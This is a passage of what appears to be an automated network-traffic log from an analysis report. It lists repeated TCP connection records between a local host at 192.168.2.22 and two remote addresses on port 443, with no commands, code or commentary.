                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
